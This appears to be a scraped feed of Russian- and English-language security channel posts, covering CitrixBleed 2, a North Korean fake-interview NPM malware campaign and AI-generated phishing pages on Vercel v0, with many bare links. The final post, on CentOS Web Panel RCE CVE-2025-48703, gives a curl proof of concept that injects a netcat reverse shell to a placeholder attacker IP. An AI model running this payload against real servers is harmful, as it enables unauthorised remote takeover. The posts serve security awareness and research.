Fsecurity | HH

🩸 CitrixBleed 2 — Citrix NetScaler Memory Leak (CVE-2025-5777) Critical memory leak vulnerability in Citrix NetScaler ADC/Gateway. Sending malformed POST request with login parameter without value causes server to return ~127 bytes of uninitialized stack memory, including session tokens, enabling MFA bypass and active session hijacking. 🔗 Research: https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/ 🔗 Source: https://github.com/win3zz/CVE-2025-5777 #citrix #netscaler #memoryleak #exploit

🔗Ссылка: https://www.securitylab.ru/news/561090.php

🚨Фишинговая атака через фальшивое предложение работы🚨 Это симуляция атаки, осуществлённой APT-группировкой (#FamousChollima), нацеленная на соискателей работы с целью достижения своих целей и компрометации множества американских компаний. Кампания была активна с декабря 2022 года. Цепочка атаки начинается с того, что злоумышленники приглашают жертву пройти онлайн-собеседование. Вероятнее всего, они используют видеоконференцсвязь или другие онлайн-инструменты для общения. Во время интервью злоумышленники убеждают жертву скачать и установить NPM-пакет, размещённый на GitHub. Этот пакет представляется как программа для анализа или проверки, но на самом деле содержит вредоносный JavaScript-код, предназначенный для заражения устройства жертвы бэкдором. 🔗 Репозиторий на GitHub: https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT/Famous%20Chollima #AdversarySimulation

🔗Ссылка: https://www.securitylab.ru/news/561081.php?r=1

🔗Ссылка: https://opennet.ru/63537/

Vercel v0: От AI-помощника до инструмента киберпреступников ➡️ Что такое Vercel v0 Vercel v0 — это AI-инструмент от компании Vercel, который позволяет создавать веб-приложения и лендинги с помощью естественного языка. Пользователь вводит текстовый промпт, а v0 генерирует готовый код с использованием React, Tailwind CSS и других современных технологий. Инструмент предназначен для быстрого прототипирования и создания базовых веб-интерфейсов без глубоких знаний программирования. ➡️ Техническая эксплуатация в фишинговых атаках Исследователи Okta обнаружили, что киберпреступники активно используют v0 для создания поддельных страниц входа. Злоумышленники генерируют копии логин-форм крупных сервисов простыми промптами типа "создай страницу входа Facebook" или "сделай форму авторизации Gmail". ➡️ Технические преимущества для атакующих: ➡️Скорость разработки: Создание фишингового сайта занимает минуты вместо часов ➡️Качество кода: AI генерирует современный, адаптивный код с правильной структурой ➡️Обход детекции: Сайты размещаются на доверенной инфраструктуре Vercel ➡️Низкий порог входа: Не требуются навыки веб-разработки ➡️ Методы размещения Злоумышленники используют несколько тактик: ➡️Хостинг поддельных логотипов компаний на серверах Vercel для повышения доверия ➡️Создание поддоменов, имитирующих легитимные сервисы ➡️Интеграция с существующими фишинговыми инфраструктурами ➡️ Эволюция угрозы Этот случай демонстрирует новый тренд — использование генеративного AI для автоматизации создания фишинговых ресурсов. В отличие от традиционных фишинг-китов, требующих технических навыков, AI-инструменты демократизируют создание качественных поддельных сайтов. Vercel уже заблокировал доступ к обнаруженным фишинговым ресурсам, но проблема системная — любой AI-инструмент для веб-разработки может быть аналогично эксплуатирован. 🔗Источник 🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

🔗Ссылка: https://habr.com/ru/companies/pt/articles/923894/

🔗Ссылка: https://habr.com/ru/companies/beget/articles/921894/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/companies/sravni/articles/924308/

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/925060/

🔗Ссылка: https://habr.com/ru/articles/924814/

🔗Ссылка: https://habr.com/ru/articles/925066/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/925010/

🔗Ссылка: https://habr.com/ru/companies/beeline_cloud/articles/925434/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/companies/sberbank/articles/923946/

🔗Ссылка: https://opennet.ru/63532/

🛡 CVE-2025-48703 - RCE in CentOS Web Panel File Manager module RCE уязвимость приложения для управления серверами CentOS Web Panel Проблема в функции acc=changePerm, где не производится должная проверка входных данных, что позволяет выполнить произвольный код в параметре t_total

❗️ Эту атаку можно выполнить с минимальной аутентификацией или в некоторых конфигурациях, с не аутентифицированным доступом.

🔗 Research PoC:

curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

💻 Scanner #cve #poc #centoswebpanel #web ✈️ Whitehat Lab 💬Chat